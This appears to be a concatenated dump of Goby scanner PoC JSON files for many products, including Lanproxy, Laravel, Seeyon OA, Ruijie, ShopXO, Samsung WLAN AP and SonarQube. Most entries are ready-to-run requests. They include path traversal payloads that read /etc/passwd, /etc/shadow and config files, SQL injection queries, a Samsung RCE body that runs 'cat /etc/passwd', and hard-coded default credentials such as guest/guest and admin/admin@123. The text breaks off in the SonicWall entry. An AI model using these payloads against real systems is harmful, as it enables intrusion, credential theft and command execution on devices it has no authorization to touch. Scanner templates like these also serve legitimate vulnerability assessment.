| "Name": "Kyan 网络监控设备 账号密码泄露", 3 | "Level": "3", 4 | "Tags": [], 5 | "GobyQuery": "title=\"platform - Login\"", 6 | "Description": "", 7 | "Product": "", 8 | "Homepage": "https://gobies.org/", 9 | "Author": "gobysec@gmail.com", 10 | "Impact": "", 11 | "Recommandation": "", 12 | "References": [ 13 | "https://gobies.org/" 14 | ], 15 | "ScanSteps": [ 16 | "AND", 17 | { 18 | "Request": { 19 | "method": "GET", 20 | "uri": "/hosts", 21 | "follow_redirect": false, 22 | "header": {}, 23 | "data_type": "text", 24 | "data": "" 25 | }, 26 | "ResponseTest": { 27 | "type": "group", 28 | "operation": "AND", 29 | "checks": [ 30 | { 31 | "type": "item", 32 | "variable": "$code", 33 | "operation": "==", 34 | "value": "200", 35 | "bz": "" 36 | }, 37 | { 38 | "type": "item", 39 | "variable": "$body", 40 | "operation": "contains", 41 | "value": "UserName=", 42 | "bz": "" 43 | } 44 | ] 45 | }, 46 | "SetVariable": [] 47 | } 48 | ], 49 | "PostTime": "2021-06-17 22:08:48", 50 | "GobyVersion": "1.8.268" 51 | } -------------------------------------------------------------------------------- /json/Kyan_design_account_password_disclosure.json: -------------------------------------------------------------------------------- 1 | { 2 | "Name": "Kyan design account password disclosure", 3 | "Level": "1", 4 | "Tags": [ 5 | "Disclosure of Sensitive Information" 6 | ], 7 | "GobyQuery": "app=\"Kyan-Design\"", 8 | "Description": "Kyan network monitoring device has an account password leakage vulnerability, through which the attacker can obtain the account password and background permissions", 9 | "Product": "Kyan-Design", 10 | "Homepage": "https://kyan.com/", 11 | "Author": "PeiQi", 12 | "Impact": "

through which the attacker can obtain the account password and background permissions

", 13 | "Recommandation": "", 14 | "References": [ 15 | "http://wiki.peiqi.tech" 16 | ], 17 | "ScanSteps": [ 18 | "AND", 19 | { 20 | "Request": { 21 | "method": "GET", 22 | "uri": "/hosts", 23 | "follow_redirect": false, 24 | "header": {}, 25 | "data_type": "text", 26 | "data": "" 27 | }, 28 | "ResponseTest": { 29 | "type": "group", 30 | "operation": "AND", 31 | "checks": [ 32 | { 33 | "type": "item", 34 | "variable": "$code", 35 | "operation": "==", 36 | "value": "200", 37 | "bz": "" 38 | }, 39 | { 40 | "type": "item", 41 | "variable": "$body", 42 | "operation": "contains", 43 | "value": "Password", 44 | "bz": "" 45 | }, 46 | { 47 | "type": "item", 48 | "variable": "$body", 49 | "operation": "contains", 50 | "value": "UserName", 51 | "bz": "" 52 | } 53 | ] 54 | }, 55 | "SetVariable": [] 56 | } 57 | ], 58 | "PostTime": "2021-04-15 21:11:09", 59 | "GobyVersion": "1.8.258" 60 | } -------------------------------------------------------------------------------- /json/Lanproxy 目录遍历漏洞 CVE-2021-3019.json: -------------------------------------------------------------------------------- 1 | { 2 | "Name": "Lanproxy 目录遍历漏洞 CVE-2021-3019", 3 | "Level": "2", 4 | "Tags": [ 5 | "目录遍历" 6 | ], 7 | "GobyQuery": "header=\"Server: LPS-0.1\"", 8 | "Description": "Lanproxy是一个将局域网个人电脑、服务器代理到公网的内网穿透工具,支持tcp流量转发,可支持任何tcp上层协议(访问内网网站、本地支付接口调试、ssh访问、远程桌面等等)本次Lanproxy 路径遍历漏洞 (CVE-2021-3019)通过../绕过读取任意文件。该漏洞允许目录遍历读取/../conf/config.properties来获取到内部网连接的凭据。", 9 | "Product": "Lanproxy 0.1", 10 | "Homepage": "https://github.com/ffay/lanproxy", 11 | "Author": "PeiQi", 12 | "Impact": "
咩咩咩🐑
", 13 | "Recommandation": "

undefined

", 14 | "References": [ 15 | "http://wiki.peiqi.tech" 16 | ], 17 | "HasExp": true, 18 | "ExpParams": [ 19 | { 20 | "name": "Filename", 21 | "type": "select", 22 | "value": "/../../../../../../../../../../etc/passwd,/../conf/config.properties,/../../../../../../../../../../etc/shadow", 23 | "show": "" 24 | } 25 | ], 26 | "ScanSteps": [ 27 | "AND", 28 | { 29 | "Request": { 30 | "method": "GET", 31 | "uri": "/../conf/config.properties", 32 | "follow_redirect": true, 33 | "header": {}, 34 | "data_type": "text", 35 | "data": "" 36 | }, 37 | "ResponseTest": { 38 | "type": "group", 39 | "operation": "AND", 40 | "checks": [ 41 | { 42 | "type": "item", 43 | "variable": "$code", 44 | "operation": "==", 45 | "value": "200", 46 | "bz": "" 47 | }, 48 | { 49 | "type": "item", 50 | "variable": "$body", 51 | "operation": "contains", 52 | "value": "server.ssl", 53 | "bz": "" 54 | } 55 | ] 56 | }, 57 | "SetVariable": [] 58 | } 59 | ], 60 | "ExploitSteps": [ 61 | "AND", 62 | { 63 | "Request": { 64 | "method": "GET", 65 | "uri": "{{{Filename}}}", 66 | "follow_redirect": true, 67 | "header": {}, 68 | "data_type": "text", 69 | "data": "" 70 | }, 71 | "SetVariable": [ 72 | "output|lastbody" 73 | ] 74 | } 75 | ], 76 | "PostTime": "2021-01-22 18:20:52", 77 | "GobyVersion": "1.8.237" 78 | } -------------------------------------------------------------------------------- /json/Laravel .env 配置文件泄露 CVE-2017-16894.json: -------------------------------------------------------------------------------- 1 | { 2 | "Name": "Laravel .env 配置文件泄露 CVE-2017-16894", 3 | "Level": "1", 4 | "Tags": [ 5 | "信息泄露" 6 | ], 7 | "GobyQuery": "app=\"Laravel-Framework\"", 8 | "Description": "Laravel Framework是Taylor Otwell软件开发者开发的一款基于PHP的Web应用程序开发框架。 Laravel framework 5.5.21及之前的版本中存在 .env 文件可被下载的信息泄露漏洞。远程攻击者可利用该漏洞获取敏感信息", 9 | "Product": "Laravel framework <= 5.5.21", 10 | "Homepage": "https://github.com/laravel/framework/tree/5.5", 11 | "Author": "PeiQi", 12 | "Impact": "

咩咩咩🐏

", 13 | "Recommandation": "", 14 | "References": [ 15 | "http://wiki.peiqi.tech" 16 | ], 17 | "HasExp": true, 18 | "ExpParams": [ 19 | { 20 | "name": ".env", 21 | "type": "select", 22 | "value": ".env", 23 | "show": "" 24 | } 25 | ], 26 | "ScanSteps": [ 27 | "AND", 28 | { 29 | "Request": { 30 | "method": "GET", 31 | "uri": "/.env", 32 | "follow_redirect": true, 33 | "header": {}, 34 | "data_type": "text", 35 | "data": "" 36 | }, 37 | "ResponseTest": { 38 | "type": "group", 39 | "operation": "AND", 40 | "checks": [ 41 | { 42 | "type": "item", 43 | "variable": "$code", 44 | "operation": "==", 45 | "value": "200", 46 | "bz": "" 47 | }, 48 | { 49 | "type": "item", 50 | "variable": "$body", 51 | "operation": "contains", 52 | "value": "APP_NAME", 53 | "bz": "" 54 | } 55 | ] 56 | }, 57 | "SetVariable": [] 58 | } 59 | ], 60 | "ExploitSteps": [ 61 | "AND", 62 | { 63 | "Request": { 64 | "method": "GET", 65 | "uri": "/.env", 66 | "follow_redirect": true, 67 | "header": {}, 68 | "data_type": "text", 69 | "data": "" 70 | }, 71 | "SetVariable": [ 72 | "output|lastbody" 73 | ] 74 | } 75 | ], 76 | "PostTime": "2021-01-24 12:19:09", 77 | "GobyVersion": "1.8.237" 78 | } -------------------------------------------------------------------------------- /json/MessageSolution 邮件归档系统EEA 信息泄露漏洞 CNVD-2021-10543.json: -------------------------------------------------------------------------------- 1 | { 2 | "Name": "MessageSolution 邮件归档系统EEA 信息泄露漏洞 CNVD-2021-10543", 3 | "Level": "2", 4 | "Tags": [ 5 | "账号密码泄露" 6 | ], 7 | "GobyQuery": "title=\"MessageSolution Enterprise Email Archiving (EEA)\" ", 8 | "Description": "MessageSolution企业邮件归档管理系统 EEA是北京易讯思达科技开发有限公司开发的一款邮件归档系统。该系统存在通用WEB信息泄漏,泄露Windows服务器administrator hash与web账号密码", 9 | "Product": "MessageSolution企业邮件归档管理系统", 10 | "Homepage": "PeiQi", 11 | "Author": "PeiQi", 12 | "Impact": "

🐏

", 13 | "Recommandation": "", 14 | "References": [ 15 | "http://wiki.peiqi.tech" 16 | ], 17 | "HasExp": true, 18 | "ScanSteps": [ 19 | "AND", 20 | { 21 | "Request": { 22 | "method": "GET", 23 | "uri": "/authenticationserverservlet/", 24 | "follow_redirect": true, 25 | "header": {}, 26 | "data_type": "text", 27 | "data": "" 28 | }, 29 | "ResponseTest": { 30 | "type": "group", 31 | "operation": "AND", 32 | "checks": [ 33 | { 34 | "type": "item", 35 | "variable": "$code", 36 | "operation": "==", 37 | "value": "200", 38 | "bz": "" 39 | }, 40 | { 41 | "type": "item", 42 | "variable": "$body", 43 | "operation": "contains", 44 | "value": "administrator", 45 | "bz": "" 46 | } 47 | ] 48 | }, 49 | "SetVariable": [] 50 | } 51 | ], 52 | "ExploitSteps": [ 53 | "AND", 54 | { 55 | "Request": { 56 | "method": "GET", 57 | "uri": "/authenticationserverservlet/", 58 | "follow_redirect": true, 59 | "header": {}, 60 | "data_type": "text", 61 | "data": "" 62 | }, 63 | "SetVariable": [ 64 | "output|lastbody" 65 | ] 66 | } 67 | ], 68 | "PostTime": "2021-03-22 14:21:12", 69 | "GobyVersion": "1.8.237" 70 | } -------------------------------------------------------------------------------- /json/RG_UAC.json: -------------------------------------------------------------------------------- 1 | { 2 | "Name": "RG-UAC", 3 | "Level": "3", 4 | "Tags": [], 5 | "GobyQuery": "title=\"RG-UAC登录页面\"", 6 | "Description": "锐捷RG-UAC 账户硬编码漏洞", 7 | "Product": "", 8 | "Homepage": "https://gobies.org/", 9 | "Author": "gobysec@gmail.com", 10 | "Impact": "", 11 | "Recommandation": "", 12 | "References": [ 13 | "https://gobies.org/" 14 | ], 15 | "ScanSteps": [ 16 | "AND", 17 | { 18 | "Request": { 19 | "method": "GET", 20 | "uri": "/get_dkey.php?user=admin", 21 | "follow_redirect": true, 22 | "header": {}, 23 | "data_type": "text", 24 | "data": "" 25 | }, 26 | "ResponseTest": { 27 | "type": "group", 28 | "operation": "AND", 29 | "checks": [ 30 | { 31 | "type": "item", 32 | "variable": "$code", 33 | "operation": "==", 34 | "value": "200", 35 | "bz": "" 36 | }, 37 | { 38 | "type": "item", 39 | "variable": "$body", 40 | "operation": "contains", 41 | "value": "password", 42 | "bz": "" 43 | } 44 | ] 45 | }, 46 | "SetVariable": [] 47 | } 48 | ], 49 | "PostTime": "2021-04-25 13:05:29", 50 | "GobyVersion": "1.8.239" 51 | } -------------------------------------------------------------------------------- /json/Ruijie_smartweb_weak_password.json: -------------------------------------------------------------------------------- 1 | { 2 | "Name": "Ruijie smartweb weak password", 3 | "Level": "1", 4 | "Tags": [ 5 | "弱口令" 6 | ], 7 | "GobyQuery": "app=\"Ruijie-WiFi\" && body=\"无线smartWeb--登录页面\"", 8 | "Description": "Ruijie smartweb management system opens the guest account vulnerability by default , and the attacker can log in to the background through the vulnerability to further attack (guest/guest)", 9 | "Product": "Ruijie smartweb", 10 | "Homepage": "http://www.ruijie.com.cn/", 11 | "Author": "PeiQi", 12 | "Impact": "

The attacker can log in to the background for further attack

", 13 | "Recommandation": "

undefined

", 14 | "References": [ 15 | "http://wiki.peiqi.tech" 16 | ], 17 | "ScanSteps": [ 18 | "AND", 19 | { 20 | "Request": { 21 | "method": "POST", 22 | "uri": "/WEB_VMS/LEVEL15/", 23 | "follow_redirect": false, 24 | "header": { 25 | "Authorization": "Basic Z3Vlc3Q6Z3Vlc3Q=" 26 | }, 27 | "data_type": "text", 28 | "data": "command=show basic-info dev&strurl=exec%04&mode=%02PRIV_EXEC&signname=Red-Giant." 29 | }, 30 | "ResponseTest": { 31 | "type": "group", 32 | "operation": "AND", 33 | "checks": [ 34 | { 35 | "type": "item", 36 | "variable": "$code", 37 | "operation": "==", 38 | "value": "200", 39 | "bz": "" 40 | }, 41 | { 42 | "type": "item", 43 | "variable": "$body", 44 | "operation": "contains", 45 | "value": "Level was: LEVEL15", 46 | "bz": "" 47 | } 48 | ] 49 | }, 50 | "SetVariable": [] 51 | } 52 | ], 53 | "PostTime": "2021-04-04 11:26:02", 54 | "GobyVersion": "1.8.255" 55 | } -------------------------------------------------------------------------------- /json/RuoYi_Druid_Unauthorized_access.json: -------------------------------------------------------------------------------- 1 | { 2 | "Name": "RuoYi Druid Unauthorized access", 3 | "Level": "0", 4 | "Tags": [ 5 | "Disclosure of Sensitive Information" 6 | ], 7 | "GobyQuery": "app=\"ruoyi-System\"", 8 | "Description": "If Druid is used in the management system, anonymous access is enabled by default, resulting in unauthorized access to sensitive information", 9 | "Product": "RuoYi", 10 | "Homepage": "https://gitee.com/y_project/RuoYi-Vue", 11 | "Author": "PeiQi", 12 | "Impact": "

 resulting in unauthorized access to sensitive information

", 13 | "Recommandation": "", 14 | "References": [ 15 | "http://wiki.peiqi.tech" 16 | ], 17 | "ScanSteps": [ 18 | "AND", 19 | { 20 | "Request": { 21 | "method": "GET", 22 | "uri": "/prod-api/druid/index.html", 23 | "follow_redirect": false, 24 | "header": {}, 25 | "data_type": "text", 26 | "data": "" 27 | }, 28 | "ResponseTest": { 29 | "type": "group", 30 | "operation": "AND", 31 | "checks": [ 32 | { 33 | "type": "item", 34 | "variable": "$code", 35 | "operation": "==", 36 | "value": "200", 37 | "bz": "" 38 | }, 39 | { 40 | "type": "item", 41 | "variable": "$body", 42 | "operation": "contains", 43 | "value": "Druid Stat Index", 44 | "bz": "" 45 | }, 46 | { 47 | "type": "item", 48 | "variable": "$body", 49 | "operation": "contains", 50 | "value": "View JSON API", 51 | "bz": "" 52 | } 53 | ] 54 | }, 55 | "SetVariable": [] 56 | } 57 | ], 58 | "PostTime": "2021-04-20 23:13:54", 59 | "GobyVersion": "1.8.258" 60 | } -------------------------------------------------------------------------------- /json/SDWAN_smart_gateway_weak_password.json: -------------------------------------------------------------------------------- 1 | { 2 | "Name": "SDWAN智能网关应用系统弱口令", 3 | "Level": "3", 4 | "Tags": [], 5 | "GobyQuery": "body=\"unierm_brand/logo.png\"", 6 | "Description": "", 7 | "Product": "", 8 | "Homepage": "https://gobies.org/", 9 | "Author": "luckying", 10 | "Impact": "", 11 | "Recommandation": "

undefined

", 12 | "References": [ 13 | "https://gobies.org/" 14 | ], 15 | "ScanSteps": [ 16 | "AND", 17 | { 18 | "Request": { 19 | "method": "POST", 20 | "uri": "/Login/Index/doLogin", 21 | "follow_redirect": false, 22 | "header": { 23 | "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8" 24 | }, 25 | "data_type": "text", 26 | "data": "username=admin&password=admin%40123" 27 | }, 28 | "ResponseTest": { 29 | "type": "group", 30 | "operation": "AND", 31 | "checks": [ 32 | { 33 | "type": "item", 34 | "variable": "$body", 35 | "operation": "contains", 36 | "value": "true", 37 | "bz": "" 38 | }, 39 | { 40 | "type": "item", 41 | "variable": "$body", 42 | "operation": "contains", 43 | "value": "userid", 44 | "bz": "" 45 | } 46 | ] 47 | }, 48 | "SetVariable": [] 49 | } 50 | ], 51 | "PostTime": "2021-06-23 18:32:59", 52 | "GobyVersion": "1.8.268" 53 | } -------------------------------------------------------------------------------- /json/Samsung_WLAN_AP_WEA453e_RCE.json: -------------------------------------------------------------------------------- 1 | { 2 | "Name": "Samsung WLAN AP WEA453e RCE", 3 | "Level": "3", 4 | "Tags": [], 5 | "GobyQuery": "title==\"Samsung WLAN AP\"", 6 | "Description": "三星 WLAN AP WEA453e路由器 存在远程命令执行漏洞,可在未授权的情况下执行任意命令获取服务器权限", 7 | "Product": "三星 WLAN AP WEA453e路由器", 8 | "Homepage": "https://www.samsung.com/", 9 | "Author": "lxy@secbug.org", 10 | "Impact": "

暂无

", 11 | "Recommandation": "

暂无

", 12 | "References": [ 13 | "Internet" 14 | ], 15 | "ScanSteps": [ 16 | "AND", 17 | { 18 | "Request": { 19 | "method": "POST", 20 | "uri": "/(download)/tmp/a.txt", 21 | "follow_redirect": true, 22 | "header": { 23 | "Connection": "close", 24 | "Content-Length": "48" 25 | }, 26 | "data_type": "text", 27 | "data": "command1=shell:cat /etc/passwd| dd of=/tmp/a.txt" 28 | }, 29 | "ResponseTest": { 30 | "type": "group", 31 | "operation": "AND", 32 | "checks": [ 33 | { 34 | "type": "item", 35 | "variable": "$code", 36 | "operation": "==", 37 | "value": "200", 38 | "bz": "" 39 | }, 40 | { 41 | "type": "item", 42 | "variable": "$body", 43 | "operation": "contains", 44 | "value": "root", 45 | "bz": "" 46 | } 47 | ] 48 | }, 49 | "SetVariable": [] 50 | } 51 | ], 52 | "PostTime": "2021-04-01 11:47:39", 53 | "GobyVersion": "1.8.237" 54 | } -------------------------------------------------------------------------------- /json/Seeyon_OA_A6_DownExcelBeanServlet_User_information_leakage.json: -------------------------------------------------------------------------------- 1 | { 2 | "Name": "Seeyon OA A6 DownExcelBeanServlet User information leakage", 3 | "Level": "0", 4 | "Tags": [ 5 | "Disclosure of Sensitive Information" 6 | ], 7 | "GobyQuery": "app=\"Yonyou-Seeyon-OA\" && body=\"致远协创A6\"", 8 | "Description": "There is an unauthorized interface in Zhiyuan OA A6, so that any visitor can download the user information in OA", 9 | "Product": "Seeyon OA A6", 10 | "Homepage": "https://www.seeyon.com/", 11 | "Author": "PeiQi", 12 | "Impact": "

Download user information file

", 13 | "Recommandation": "", 14 | "References": [ 15 | "http://wiki.peiqi.tech" 16 | ], 17 | "ScanSteps": [ 18 | "AND", 19 | { 20 | "Request": { 21 | "method": "GET", 22 | "uri": "/yyoa/DownExcelBeanServlet?contenttype=username&contentvalue=&state=1&per_id=0", 23 | "follow_redirect": false, 24 | "header": {}, 25 | "data_type": "text", 26 | "data": "" 27 | }, 28 | "ResponseTest": { 29 | "type": "group", 30 | "operation": "AND", 31 | "checks": [ 32 | { 33 | "type": "item", 34 | "variable": "$code", 35 | "operation": "==", 36 | "value": "200", 37 | "bz": "" 38 | }, 39 | { 40 | "type": "item", 41 | "variable": "$body", 42 | "operation": "contains", 43 | "value": "@", 44 | "bz": "" 45 | } 46 | ] 47 | }, 48 | "SetVariable": [] 49 | } 50 | ], 51 | "PostTime": "2021-04-05 09:43:32", 52 | "GobyVersion": "1.8.255" 53 | } -------------------------------------------------------------------------------- /json/Seeyon_OA_A6_initDataAssess.jsp_User_information_leakage.json: -------------------------------------------------------------------------------- 1 | { 2 | "Name": "Seeyon OA A6 initDataAssess.jsp User information leakage", 3 | "Level": "0", 4 | "Tags": [ 5 | "Disclosure of Sensitive Information" 6 | ], 7 | "GobyQuery": "app=\"Yonyou-Seeyon-OA\" && body=\"致远协创A6\"", 8 | "Description": "Seeyon OA A6 initDataAssess.jsp There is leakage of user sensitive information\nYou can get the user name blasting user password into the background to further attack", 9 | "Product": "Seeyon OA A6", 10 | "Homepage": "https://www.seeyon.com/", 11 | "Author": "PeiQi", 12 | "Impact": "

User name explodes, user password enters the background to further attack

", 13 | "Recommandation": "

undefined

", 14 | "References": [ 15 | "http://wiki.peiqi.tech" 16 | ], 17 | "ScanSteps": [ 18 | "AND", 19 | { 20 | "Request": { 21 | "method": "GET", 22 | "uri": "/yyoa/assess/js/initDataAssess.jsp", 23 | "follow_redirect": false, 24 | "header": {}, 25 | "data_type": "text", 26 | "data": "" 27 | }, 28 | "ResponseTest": { 29 | "type": "group", 30 | "operation": "AND", 31 | "checks": [ 32 | { 33 | "type": "item", 34 | "variable": "$code", 35 | "operation": "==", 36 | "value": "200", 37 | "bz": "" 38 | }, 39 | { 40 | "type": "item", 41 | "variable": "$body", 42 | "operation": "contains", 43 | "value": "personList", 44 | "bz": "" 45 | }, 46 | { 47 | "type": "item", 48 | "variable": "$body", 49 | "operation": "not contains", 50 | "value": "/yyoa/index.jsp", 51 | "bz": "" 52 | } 53 | ] 54 | }, 55 | "SetVariable": [] 56 | } 57 | ], 58 | "PostTime": "2021-04-05 10:33:26", 59 | "GobyVersion": "1.8.255" 60 | } -------------------------------------------------------------------------------- /json/Seeyon_OA_A6_setextno.jsp_SQL_injection.json: -------------------------------------------------------------------------------- 1 | { 2 | "Name": "Seeyon OA A6 setextno.jsp SQL injection", 3 | "Level": "2", 4 | "Tags": [ 5 | "SQL Injection" 6 | ], 7 | "GobyQuery": "app=\"Yonyou-Seeyon-OA\" && body=\"致远协创A6\"", 8 | "Description": "Seeyon OA A6 setextno.jsp There is a SQL injection vulnerability, and the server can be controlled by injecting and writing webshell files", 9 | "Product": "Seeyon OA A6", 10 | "Homepage": "https://www.seeyon.com/", 11 | "Author": "PeiQi", 12 | "Impact": "

Controlling the server by injecting and writing webshell files

", 13 | "Recommandation": "

undefined

", 14 | "References": [ 15 | "http://wiki.peiqi.tech" 16 | ], 17 | "ScanSteps": [ 18 | "AND", 19 | { 20 | "Request": { 21 | "method": "GET", 22 | "uri": "/yyoa/ext/trafaxserver/ExtnoManage/setextno.jsp?user_ids=%2899999%29%20union%20all%20select%201,2,%28md5%281%29%29,4", 23 | "follow_redirect": false, 24 | "header": {}, 25 | "data_type": "text", 26 | "data": "" 27 | }, 28 | "ResponseTest": { 29 | "type": "group", 30 | "operation": "AND", 31 | "checks": [ 32 | { 33 | "type": "item", 34 | "variable": "$code", 35 | "operation": "==", 36 | "value": "200", 37 | "bz": "" 38 | }, 39 | { 40 | "type": "item", 41 | "variable": "$body", 42 | "operation": "contains", 43 | "value": "c4ca4238a0b923820dcc509a6f75849b", 44 | "bz": "" 45 | } 46 | ] 47 | }, 48 | "SetVariable": [] 49 | } 50 | ], 51 | "PostTime": "2021-04-05 13:58:27", 52 | "GobyVersion": "1.8.255" 53 | } -------------------------------------------------------------------------------- /json/Seeyon_OA_A6_test.jsp_SQL_injection.json: -------------------------------------------------------------------------------- 1 | { 2 | "Name": "Seeyon OA A6 test.jsp SQL injection", 3 | "Level": "2", 4 | "Tags": [ 5 | "SQL Injection" 6 | ], 7 | "GobyQuery": "app=\"Yonyou-Seeyon-OA\"", 8 | "Description": "Seeyon OA A6 test.jsp There is a SQL injection vulnerability, and the server can be controlled by injecting and writing webshell files", 9 | "Product": "Seeyon OA A6 ", 10 | "Homepage": "https://www.seeyon.com/", 11 | "Author": "PeiQi", 12 | "Impact": "

Controlling the server by injecting and writing webshell files

", 13 | "Recommandation": "", 14 | "References": [ 15 | "http://wiki.peiqi.tech" 16 | ], 17 | "HasExp": true, 18 | "ExpParams": [ 19 | { 20 | "name": "SQL", 21 | "type": "select", 22 | "value": "SELECT @@basedir", 23 | "show": "" 24 | } 25 | ], 26 | "ScanSteps": [ 27 | "AND", 28 | { 29 | "Request": { 30 | "method": "GET", 31 | "uri": "/yyoa/common/js/menu/test.jsp?doType=101&S1=(SELECT%20md5(1))", 32 | "follow_redirect": true, 33 | "header": {}, 34 | "data_type": "text", 35 | "data": "" 36 | }, 37 | "ResponseTest": { 38 | "type": "group", 39 | "operation": "AND", 40 | "checks": [ 41 | { 42 | "type": "item", 43 | "variable": "$code", 44 | "operation": "==", 45 | "value": "200", 46 | "bz": "" 47 | }, 48 | { 49 | "type": "item", 50 | "variable": "$body", 51 | "operation": "contains", 52 | "value": "c4ca4238a0b923820dcc509a6f75849b", 53 | "bz": "" 54 | } 55 | ] 56 | }, 57 | "SetVariable": [] 58 | } 59 | ], 60 | "ExploitSteps": [ 61 | "AND", 62 | { 63 | "Request": { 64 | "method": "GET", 65 | "uri": "/yyoa/common/js/menu/test.jsp?doType=101&S1=(SELECT%20@@basedir)", 66 | "follow_redirect": true, 67 | "header": {}, 68 | "data_type": "text", 69 | "data": "" 70 | }, 71 | "SetVariable": [ 72 | "output|lastbody|regex|(.*?)" 73 | ] 74 | } 75 | ], 76 | "PostTime": "2021-04-05 12:04:57", 77 | "GobyVersion": "1.8.255" 78 | } -------------------------------------------------------------------------------- /json/Seeyon_OA_A8_m_Information_leakage.json: -------------------------------------------------------------------------------- 1 | { 2 | "Name": "Seeyon OA A8-m Information leakage", 3 | "Level": "0", 4 | "Tags": [ 5 | "Disclosure of Sensitive Information" 6 | ], 7 | "GobyQuery": "app=\"Apache-Tomcat\" && body=\"A8-m\"", 8 | "Description": "Seeyon OA A8-m has state monitoring page information leakage, from which attackers can obtain sensitive information such as website path and user name for further attack", 9 | "Product": "Seeyon OA A8-m", 10 | "Homepage": "https://www.seeyon.com/", 11 | "Author": "PeiQi", 12 | "Impact": "

Attackers can obtain sensitive information such as website path and user name to further attack

", 13 | "Recommandation": "

undefined

", 14 | "References": [ 15 | "http://wiki.peiqi.tech" 16 | ], 17 | "ScanSteps": [ 18 | "AND", 19 | { 20 | "Request": { 21 | "method": "GET", 22 | "uri": "/seeyon/management/index.jsp", 23 | "follow_redirect": false, 24 | "header": {}, 25 | "data_type": "text", 26 | "data": "" 27 | }, 28 | "ResponseTest": { 29 | "type": "group", 30 | "operation": "AND", 31 | "checks": [ 32 | { 33 | "type": "item", 34 | "variable": "$code", 35 | "operation": "==", 36 | "value": "200", 37 | "bz": "" 38 | }, 39 | { 40 | "type": "item", 41 | "variable": "$body", 42 | "operation": "contains", 43 | "value": "Password", 44 | "bz": "" 45 | } 46 | ] 47 | }, 48 | "SetVariable": [] 49 | } 50 | ], 51 | "PostTime": "2021-04-05 14:59:04", 52 | "GobyVersion": "1.8.255" 53 | } -------------------------------------------------------------------------------- /json/ShopXO_download_Arbitrary_file_read_CNVD_2021_15822.json: -------------------------------------------------------------------------------- 1 | { 2 | "Name": "ShopXO download 任意文件读取漏洞 CNVD-2021-15822", 3 | "Level": "2", 4 | "Tags": [], 5 | "GobyQuery": "(title='ShopXO')", 6 | "Description": "ShopXO是一套开源的企业级开源电子商务系统。\nShopXO存在文件上传漏洞,攻击者可利用该漏洞获取网站服务器控制权。", 7 | "Product": "ShopXO", 8 | "Homepage": "https://www.shopxo.net", 9 | "Author": "gobysec@gmail.com", 10 | "Impact": "", 11 | "Recommandation": "

undefined

", 12 | "References": [ 13 | "https://mp.weixin.qq.com/s/69cDWCDoVXRhehqaHPgYog" 14 | ], 15 | "HasExp": true, 16 | "ExpParams": [ 17 | { 18 | "name": "Cmd", 19 | "type": "input", 20 | "value": "L2V0Yy9wYXNzd2Q=", 21 | "show": "" 22 | } 23 | ], 24 | "ScanSteps": [ 25 | "AND", 26 | { 27 | "Request": { 28 | "method": "GET", 29 | "uri": "/public/index.php?s=/index/qrcode/download/url/L2V0Yy9wYXNzd2Q=", 30 | "follow_redirect": true, 31 | "header": {}, 32 | "data_type": "text", 33 | "data": "" 34 | }, 35 | "ResponseTest": { 36 | "type": "group", 37 | "operation": "AND", 38 | "checks": [ 39 | { 40 | "type": "item", 41 | "variable": "$body", 42 | "operation": "contains", 43 | "value": "root", 44 | "bz": "" 45 | } 46 | ] 47 | }, 48 | "SetVariable": [] 49 | } 50 | ], 51 | "ExploitSteps": [ 52 | "AND", 53 | { 54 | "Request": { 55 | "method": "GET", 56 | "uri": "/public/index.php?s=/index/qrcode/download/url/{{{Cmd}}}", 57 | "follow_redirect": true, 58 | "header": {}, 59 | "data_type": "text", 60 | "data": "" 61 | }, 62 | "ResponseTest": { 63 | "type": "group", 64 | "operation": "AND", 65 | "checks": [ 66 | { 67 | "type": "item", 68 | "variable": "$body", 69 | "operation": "contains", 70 | "value": "root", 71 | "bz": "" 72 | } 73 | ] 74 | }, 75 | "SetVariable": [ 76 | "output|lastbody" 77 | ] 78 | } 79 | ], 80 | "PostTime": "2021-06-02 14:48:55", 81 | "GobyVersion": "1.8.268" 82 | } -------------------------------------------------------------------------------- /json/SonarQube_unauth_CVE_2020_27986.json: -------------------------------------------------------------------------------- 1 | { 2 | "Name": "SonarQube unauth CVE-2020-27986", 3 | "Level": "3", 4 | "Tags": [ 5 | "unauth" 6 | ], 7 | "GobyQuery": "app=\"SonarQube\"", 8 | "Description": "SonarQube 8.4.2.36762 allows remote attackers to discover cleartext SMTP, SVN, and GitLab credentials via the api/settings/values URI.", 9 | "Product": "SonarQube", 10 | "Homepage": "https://www.sonarqube.org/", 11 | "Author": "aetkrad", 12 | "Impact": "", 13 | "Recommendation": "", 14 | "References": [ 15 | "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-27986" 16 | ], 17 | "HasExp": false, 18 | "ExpParams": null, 19 | "ExpTips": { 20 | "Type": "", 21 | "Content": "" 22 | }, 23 | "ScanSteps": [ 24 | "AND", 25 | { 26 | "Request": { 27 | "method": "GET", 28 | "uri": "/api/settings/values", 29 | "follow_redirect": false, 30 | "header": null, 31 | "data_type": "text", 32 | "data": "", 33 | "set_variable": [] 34 | }, 35 | "ResponseTest": { 36 | "type": "group", 37 | "operation": "AND", 38 | "checks": [ 39 | { 40 | "type": "item", 41 | "variable": "$code", 42 | "operation": "==", 43 | "value": "200", 44 | "bz": "" 45 | }, 46 | { 47 | "type": "item", 48 | "variable": "$body", 49 | "operation": "contains", 50 | "value": "sonaranalyzer-cs.nuget.packageVersion", 51 | "bz": "" 52 | }, 53 | { 54 | "type": "item", 55 | "variable": "$body", 56 | "operation": "contains", 57 | "value": "sonar.core.id", 58 | "bz": "" 59 | } 60 | ] 61 | }, 62 | "SetVariable": [ 63 | "output|lastbody|regex|" 64 | ] 65 | } 66 | ], 67 | "PostTime": "2021-11-29 15:03:58", 68 | "GobyVersion": "1.9.310" 69 | } -------------------------------------------------------------------------------- /json/SonicWall SSL-VPN 远程命令执行漏洞.json: -------------------------------------------------------------------------------- 1 | { 2 | "Name": "SonicWall SSL-VPN 远程命令执行漏洞", 3 | "Level": "3", 4 | "Tags": [ 5 | "RCE" 6 | ], 7 | "GobyQuery": "(app=\"SonicWALL-Company's-product\" || app=\"SonicWALL-SSL-VPN\")", 8 | "Description": "SonicWall SSL-VPN 远程命令执行在1月24日被公开 EXP,此设备存在远程命令执行漏洞", 9 | "Product": "SonicWall SSL-VPN", 10 | "Homepage": "https://www.sonicwall.com/", 11 | "Author": "PeiQi", 12 | "Impact": "

🐏

